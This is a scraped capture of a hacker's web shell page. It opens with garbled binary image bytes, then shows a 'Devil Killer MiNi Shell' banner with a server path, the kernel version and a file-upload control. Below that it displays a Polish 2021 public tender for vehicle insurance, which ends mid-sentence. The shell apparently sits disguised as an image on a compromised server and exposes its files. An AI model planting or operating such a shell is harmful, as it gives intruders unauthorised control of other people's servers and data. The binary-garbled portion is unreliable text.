JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211116/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211116/0027074901-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> UBEZPIECZENIA KOMUNIKACYNE PRZEDSIĘBIORSTWA GOSPODARKI KOMUNALNEJ SP. Z O.O. W ZAMOŚCIU </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzi podmiot, któremu powierzono przeprowadzenie postępowania</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">EIB S.A.</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 870270059</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Jęczmienna 21</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Toruń</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">87-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">kujawsko-pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL613 - Bydgosko-toruński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48566424775</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">marcin.nagorski@eib.com.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.eib.com.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h3 class="mb-0">1.11.) Dane podmiotu, któremu zamawiający powierzył przeprowadzenie postępowania.</h3> <h3 class="p-2 mt-4 bg-light">Podmiot <span class="normal">1</span></h3> <h3 class="mb-0">1.11.1.) Nazwa podmiotu prowadzącego postępowanie: <span class="normal">EIB SA</span></h3> <h3 class="mb-0">1.11.2.) Krajowy Numer Identyfikacyjny: <span class="normal">REGON: 870270059</span></h3> <h3 class="mb-0">Adres podmiotu prowadzącego postępowanie: </h3> <h3 class="mb-0">1.11.3.) Ulica: <span class="normal">Jęczmienna 21</span></h3> <h3 class="mb-0">1.11.4.) Miejscowość: <span class="normal">Toruń</span></h3> <h3 class="mb-0">1.11.5.) Kod pocztowy: <span class="normal">87-100</span></h3> <h3 class="mb-0">1.11.6.) Województwo: <span class="normal">kujawsko-pomorskie</span></h3> <h3 class="mb-0">1.11.7.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.11.8.) Lokalizacja NUTS 3: <span class="normal">PL613 - Bydgosko-toruński</span></h3> <h3 class="mb-0">1.11.9.) Numer telefonu: <span class="normal">+48566424775</span></h3> <h3 class="mb-0">1.11.11.) Adres poczty elektronicznej: <span class="normal">marcin.nagorski@eib.com.pl</span></h3> <h3 class="mb-0">1.11.12.) Adres strony internetowej: <span class="normal">www.eib.com.pl</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> UBEZPIECZENIA KOMUNIKACYNE PRZEDSIĘBIORSTWA GOSPODARKI KOMUNALNEJ SP. Z O.O. W ZAMOŚCIU </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-f319974f-46dd-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00270749</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-11-16</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https:// www.eib.com.pl/#Przetargi <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.3.) Informacje na temat sposobu udostępnienia zastrzeżonych dokumentów zamówienia</h3> Wykonawca informacje o charakterze poufnym (Część poufną SWZ) może uzyskać poprzez<br/>Platformę zakupową EIB. Wykonawca uzyskuje dostęp do Platformy zakupowej EIB poprzez<br/>rejestrację konta lub zalogowanie, jeżeli posiada wcześniej zarejestrowane konto. Rejestracja<br/>Wykonawcy na platformie odbywa się poprzez wypełnienie odpowiedniego formularza pod<br/>adresem:<br/>https://eib-pzp.logintrade.net/rejestracja/ <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu środków komunikacji w ramach Platformy zakupowej EIB oraz poczty elektronicznej. Szczegółowe informacje w tym zakresie znajdują się w SWZ. Adres platformy zakupowej EIB:<br/>https://eib-pzp.logintrade.net/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Postępowanie prowadzone jest przy użyciu środków komunikacji elektronicznej. Komunikacja między<br/>zamawiającym a wykonawcami odbywa się przy użyciu Platformy zakupowej EIB oraz poczty<br/>elektronicznej.<br/>2. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi<br/>posiadać konto na Platformie zakupowej EIB. Rejestracja wykonawcy na platformie odbywa się<br/>poprzez wypełnienie odpowiedniego kwestionariusza dostępnego pod adresem:<br/>https://eib-pzp.logintrade.net/rejestracja/instrukcje.html<br/>Wykonawca posiadający konto na Platformie zakupowej EIB ma dostęp do możliwości złożenia,<br/>zmiany, wycofania oferty, a także funkcjonalności pozwalających na zadawanie pytań do treści SWZ<br/>oraz komunikację z zamawiającym w pozostałych obszarach.<br/>3. Wymagania techniczne wysyłania i odbierania korespondencji, w tym dokumentów elektronicznych,<br/>elektronicznych kopii dokumentów i oświadczeń oraz informacji, przekazywanych przy użyciu Platformy<br/>zakupowej EIB:<br/>3.1. Dostęp do przeglądarki internetowej. Zaleca się korzystanie z przeglądarek: Internet Explorer 10 i<br/>nowsze, Google Chrome 31, Mozilla Firefox 26, Opera 18.<br/>3.2. Pozostałe wymagania techniczne:<br/>(a) dostęp do sieci internet;<br/>(b) obsługa przez przeglądarkę protokołu XMLHttpRequest – ajax;<br/>(c) włączona obsługa JavaScript;<br/>(d) zalecana szybkość łącza internetowego powyżej 500 KB/s;<br/>(e) zainstalowany Acrobat Reader;<br/>(f) zainstalowane środowisko uruchomieniowe Java - Java SE Runtime Environment 6 Update 24 lub<br/>nowszy;<br/>(g) rozmiar wysyłanych plików każdorazowo nie powinien przekraczać 40MB;<br/>(h) Za datę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub<br/>elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich<br/>przekazania na Platformie zakupowej EIB.<br/>3.3. Wymagania techniczne wysyłania i odbierania korespondencji, w tym dokumentów<br/>elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy<br/>użyciu poczty elektronicznej:<br/>(a) dostęp do sieci internet oraz urządzenie umożliwiające obsługę poczty elektronicznej,<br/>(b) łączny rozmiar wiadomości wraz z wszystkimi załącznikami przesyłanej przy użyciu poczty<br/>elektronicznej nie może przekraczać 40MB,<br/>(c) datą odbioru danych przez zamawiającego będzie potwierdzenie dostarczenia wiadomości z<br/>serwera pocztowego zamawiającego.<br/>4. Oświadczenia, podmiotowe środki dowodowe oraz pozostałe informacje lub dokumenty inne niż<br/>oferta i Oświadczenie Wstępne, mogą być przekazywane za pośrednictwem Platformy zakupowej EIB<br/>lub za pomocą poczty elektronicznej, na wskazane w pkt 17 SWZ adresy email, o ile możliwa będzie<br/>identyfikacja podmiotu przekazującego te informacje.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">W celu zapewnienia, że wykonawca wypełnił obowiązki informacyjne wynikające z rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych – dalej RODO) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), w szczególności obowiązek informacyjny przewidziany w art. 13 RODO względem osób fizycznych, których dane osobowe dotyczą i od których dane te wykonawca bezpośrednio pozyskał oraz obowiązek informacyjny wynikający z art. 14 RODO względem osób fizycznych, których dane przekazuje zamawiającemu i których dane pośrednio pozyskał, wykonawca zobowiązany jest do złożenia wraz z ofertą oświadczenia o ich wypełnieniu. Wzór oświadczenia ujęty jest w Formularzu oferty.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest ubezpieczenie w następującym zakresie:<br/>a )Obowiązkowe ubezpieczenie odpowiedzialności cywilnej posiadaczy pojazdów mechanicznych,<br/>b) Ubezpieczenie autocasco,<br/>c) Ubezpieczenie następstw nieszczęśliwych wypadków kierowców i pasażerów pojazdów,<br/>d) Ubezpieczenie assistance. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">66516100-1 - Usługi ubezpieczenia pojazdów mechanicznych od odpowiedzialności cywilnej</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">66512100-3 - Usługi ubezpieczenia od następstw nieszczęśliwych wypadków</p> <p class="mb-0">66514110-0 - Usługi ubezpieczeń pojazdów mechanicznych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają następujące warunki<br/>udziału w postępowaniu określone przez zamawiającego, dotyczące:<br/>I. zdolności do występowania w obrocie gospodarczym tzn. są wpisani do jednego z rejestrów<br/>zawodowych lub handlowych prowadzonych w kraju, w którym mają siedzibę lub miejsce<br/>zamieszkania, co w przypadku wykonawców mających siedzibę na terenie Rzeczypospolitej<br/>Polskiej (RP) oznacza, że są wpisani do Krajowego Rejestru Sądowego<br/>II. uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika<br/>to z odrębnych przepisów tzn. posiadają odpowiednie zezwolenie, licencję, koncesję lub wpis do<br/>rejestru działalności regulowanej, jeżeli ich posiadanie jest niezbędne do świadczenia<br/>określonych usług w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, co w<br/>przypadku wykonawców mających siedzibę na terenie RP oznacza, że posiadają zezwolenie na<br/>prowadzenie działalności ubezpieczeniowej w myśl ustawy z dnia 11 września 2015 r. o<br/>działalności ubezpieczeniowej i reasekuracyjnej (t. j. Dz.U. z 2021 r. poz. 1130 ze zm.) co najmniej w zakresie tożsamym z przedmiotem niniejszego zamówienia (tj. co najmniej w grupach 1, 3, 10 i 18 Działu II Załącznika do ustawy o działalności ubezpieczeniowej i reasekuracyjnej).<br/>III. zdolności technicznej lub zawodowej tzn. posiadają potencjał techniczny do realizacji zamówienia na odpowiednim poziomie jakości. Warunek ten zostaje spełniony, jeżeli wykonawca posiada w ramach<br/>wewnętrznej struktury terenową jednostkę organizacyjną na terenie RP, która prowadzi<br/>likwidację szkód w zakresie oceny i likwidacji szkód z ubezpieczeń komunikacyjnych lub ma<br/>zawartą umowę z przedsiębiorstwem świadczącym zawodowo na terenie RP usługi w zakresie<br/>oceny i likwidacji szkód z ubezpieczeń komunikacyjnych (przedsiębiorstwo to posiada terenową<br/>jednostkę organizacyjną na terenie RP). Wskazana umowa na obsługę likwidacji szkód może być zawarta<br/>z takim przedsiębiorstwem pod warunkiem (zawieszającym lub rozwiązującym) zawarcia umowy<br/>ubezpieczenia będącej przedmiotem zamówienia.<br/>W przypadku Wykonawców ubiegających się wspólnie o udzielenie zamówienia w odniesieniu do warunków określonych w pkt. I. i II warunki te musi spełniać każdy z Wykonawców działających wspólnie, zaś w odniesieniu do warunków określonych w pkt. III. warunki te wykonawcy mogą spełniać łącznie. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W postępowaniu o udzielenie zamówienia zamawiający żąda następujących podmiotowych środków<br/>dowodowych na potwierdzenie braku podstaw wykluczenia:<br/>- oświadczenia wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy PZP, o braku przynależności do tej<br/>samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i<br/>konsumentów (Dz. U. z 2019 r. poz. 369), z innym wykonawcą, który złożył odrębną ofertę, ofertę<br/>częściową albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub<br/>informacjami potwierdzającymi przygotowanie oferty, oferty częściowej w postępowaniu niezależnie od<br/>innego wykonawcy należącego do tej samej grupy kapitałowej.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający nie żąda innych podmiotowych środków dowodowych na potwierdzenie, że wykonawca spełnia warunki udziału w postępowaniu.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie przedmiotowego zamówienia. W takim<br/>przypadku wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o<br/>udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie<br/>zamówienia publicznego zgodnie z art. 58 ust. 2 ustawy PZP:<br/>- Pełnomocnikiem może być jeden z wykonawców działających wspólnie lub osoba trzecia (np.<br/>pracownik jednego z wykonawców).<br/>- Jeżeli pełnomocnikiem pozostałych wykonawców jest wykonawca będący osobą prawną to<br/>może on działać zgodnie z ujawnionymi w dokumentach rejestrowych zasadami reprezentacji.<br/>W przypadku wspólnego ubiegania się o zamówienie przez wykonawców oświadczenie, o<br/>którym mowa w art. 125 ust. 1 ustawy PZP, składa każdy z wykonawców. Oświadczenia te<br/>potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w<br/>zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>W przypadku wykonawców ubiegających się wspólnie o udzielenie zamówienie brak podstaw do<br/>wykluczenia z postępowania powinien wykazać każdy z wykonawców.<br/>Zgodnie z art. 117 ust. 1 ustawy PZP zamawiający określa szczególny, obiektywnie<br/>uzasadniony, sposób spełniania przez wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia określonego w niniejszej SWZ warunków udziału w postępowaniu, mając na<br/>uwadze, że jest to uzasadnione charakterem zamówienia i jest proporcjonalne, wskazany w pkt.<br/>5.4) ogłoszenia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> I. Zamawiający przewiduje możliwość zmiany umowy bez przeprowadzenia nowego<br/>postępowania o udzielenie zamówienia, niezależnie od wartości tej zmiany, w tym w<br/>szczególności zmiany dotyczącej wzajemnych świadczeń stron umowy ubezpieczenia, w<br/>przypadku w przypadku:<br/>a) sytuacji, w której wykonawca wprowadzi do obrotu w czasie trwania umowy ubezpieczenia<br/>zmiany do stosowanych przez niego wzorców umownych,<br/>b) zmiany w obowiązujących przepisach prawa mającej wpływ na świadczenie usługi będącej<br/>przedmiotem niniejszego postępowania dostosowującej warunki umowy ubezpieczenia do zmian<br/>w przepisach prawa,<br/>c) doubezpieczenia, podwyższenia lub obniżenia pod/limitów w okresie ubezpieczenia,<br/>rozszerzenia lub zawężenia zakresu ubezpieczenia lub zmianę innych elementów umowy oraz<br/>rozliczenia i aktualizacji składek ubezpieczeniowych (w tym rat składek) z nią związanych, które<br/>to sytuacje nie stanowią realizacji postanowień umowy ubezpieczenia – w przypadku<br/>zidentyfikowania i uzasadnienia przez zamawiającego potrzeby dokonania takiej zmiany,<br/>d) gdy nowy wykonawca ma zastąpić dotychczasowego wykonawcę.<br/>II. Wszystkie przypadki, określone w pkt. I stanowią katalog przewidzianych przez<br/>zamawiającego zmian umowy, co do których zamawiający oraz wykonawca mogą ustalić<br/>warunki dla ich wprowadzenia. Nie stanowią jednocześnie zobowiązania do wyrażenia zgody ani<br/>przez zamawiającego ani przez wykonawcę na ich wprowadzenie lub na ustalenie warunków dla<br/>ich wprowadzenia.<br/>III. W sytuacji, gdy w trakcie okresu ubezpieczenia zajdą następujące zmiany:<br/>a) stawki podatku od towarów i usług oraz podatku akcyzowego,<br/>b) wysokości minimalnego wynagrodzenia za pracę albo wysokości minimalnej stawki<br/>godzinowej, ustalonych na podstawie ustawy z dnia 10 października 2002 r. o minimalnym<br/>wynagrodzeniu za pracę,<br/>c) zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub<br/>wysokości stawki składki na ubezpieczenia społeczne lub ubezpieczenie zdrowotne,<br/>d) zasad gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych, o których<br/>mowa w ustawie z dnia 4 października 2018 r. o pracowniczych planach kapitałowych (Dz. U. z<br/>2020, poz. 1342 t. j.) które mają wpływ na koszty wykonania zamówienia przez wykonawcę,<br/>wynagrodzenie należne wykonawcy zostanie w sposób odpowiadający powyższym zmianom<br/>zwaloryzowane.<br/>Wykonawca wnioskując do zamawiającego o dokonanie zmian wynagrodzenia na tej podstawie<br/>jest zobowiązany udowodnić, w jaki sposób powyższe zmiany wpływają na koszty wykonania<br/>przez niego zamówienia. W sytuacji, gdy jest bezspornym, że powyższe zmiany mają wpływ na<br/>koszty wykonania zamówienia przez wykonawcę, następuje zmiana postanowień umowy<br/>dotyczących wynagrodzenia wykonawcy w formie przewidzianej w pkt. V.<br/>IV. Na podstawie art. 439 ustawy Prawo zamówień publicznych, Zamawiający przewiduje<br/>możliwość zmiany wynagrodzenia Wykonawcy w przypadku zmiany ceny materiałów lub<br/>kosztów związanych z realizacją zamówienia. Zmiana 